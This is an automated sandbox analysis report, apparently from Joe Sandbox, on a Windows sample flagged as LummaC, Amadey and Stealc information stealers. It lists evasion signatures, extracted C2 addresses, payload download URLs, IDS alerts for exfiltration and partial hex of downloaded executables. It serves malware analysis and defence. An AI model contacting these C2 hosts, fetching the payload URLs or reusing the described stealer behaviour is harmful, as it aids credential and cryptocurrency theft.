Windows Analysis Report
8ObkdHP9Hq.exe

Overview

General Information

Sample name: 8ObkdHP9Hq.exe
renamed because original name is a hash value
Original sample name: 77b69071ccc75e75a48ea59d48a55a30.exe
Analysis ID: 1527565
MD5: 77b69071ccc75e75a48ea59d48a55a30
SHA1: 1462b225e40ce72df31075d9ca920a356818fe3c
SHA256: e7dd285dc9f2ba81816427bb3a6f90645deb0b8d346d2edb81e9283a1bdbf787
Tags: 32exetrojan
Infos:

Detection

LummaC, Amadey, Credential Flusher, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Excessive usage of taskkill to terminate processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 8ObkdHP9Hq.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: http://185.215.113.37/ URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 44.2.num.exe.b80000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for domain / URL
Source: https://bathdoomgaz.store:443/api Virustotal: Detection: 13% Perma Link
Source: http://185.215.113.103/luma/random.exe Virustotal: Detection: 20% Perma Link
Source: http://185.215.113.103/test/num.exe Virustotal: Detection: 25% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.php Virustotal: Detection: 17% Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phpu Virustotal: Detection: 16% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpncoded Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: 8ObkdHP9Hq.exe ReversingLabs: Detection: 52%
Source: 8ObkdHP9Hq.exe Virustotal: Detection: 56% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 8ObkdHP9Hq.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA, 20_2_00B8C820
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B98EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 20_2_00B98EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B89AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 20_2_00B89AC0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B87240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 20_2_00B87240
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B89B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 20_2_00B89B60
Uses 32bit PE files
Source: 8ObkdHP9Hq.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:61189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61190 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00B8DBBE
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B968EE FindFirstFileW,FindClose, 6_2_00B968EE
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00B9698F
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B8D076
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B8D3A9
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B99642
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B9979D
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00B99B2B
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B95C97 FindFirstFileW,FindNextFileW,FindClose, 6_2_00B95C97
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B938B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 20_2_00B938B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 20_2_00B8E430
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 20_2_00B8ED20
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B94910
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B94570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 20_2_00B94570
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B8F6B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 20_2_00B93EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 20_2_00B8DA80
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B816D0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B8DE10
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 20_2_00B8BE70

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49788 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49804
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49836 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49872 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49854 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:60282 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:65496 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:49186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50272 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:62676 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:53746 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:51433 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:55038 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:61038 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:61131 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:51649 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:52889 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:56170 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:51058 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:58735 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:56028 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:49932 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:62159 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:63468 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:63294 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:56035 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:63822 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:54310 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:63695 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:50984 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:49352 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:61184 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:61043 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:61043 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:61190 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:61190 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:61010 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 01:11:45 GMTETag: "e0600-623d8b459b4e3"Accept-Ranges: bytesContent-Length: 919040Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 49 35 03 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a3 56 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b8 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 9b 00 00 00 40 0d 00 00 9c 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 90 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTETag: "4cc00-6233dc0bf3e80"Accept-Ranges: bytesContent-Length: 314368Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 